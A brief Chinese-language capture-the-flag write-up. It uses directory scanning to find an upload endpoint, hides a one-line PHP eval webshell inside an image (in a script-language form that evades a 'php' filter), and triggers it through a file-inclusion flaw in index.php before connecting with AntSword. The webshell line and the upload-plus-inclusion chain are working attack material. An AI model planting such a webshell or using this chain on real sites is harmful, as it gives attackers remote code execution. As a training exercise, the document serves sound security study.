时效性
2025年8月11日
题目来源
题目描述
Write Up
直接通过dirsearch 扫描后台路径,找到一个上传文件接口
直接尝试上传一句话木马,发现后端进行了文件类型校验,想到这是一个文件包含题目,所以应该是图片码外加文件包含
copy demo.png/b + yjh.php tpm.jpg
上传以后,发现php被过滤了,重新下载下来的文件php被过滤了
<script language="php">@eval($_POST[pass])</script>
上传以后找到对应的文件路径
注意,这里的index.php存在文件包含漏洞
117.72.52.127:11677/index.php?file=upload/202508110147336157.png
尝试使用蚁剑进行连接,连接成功
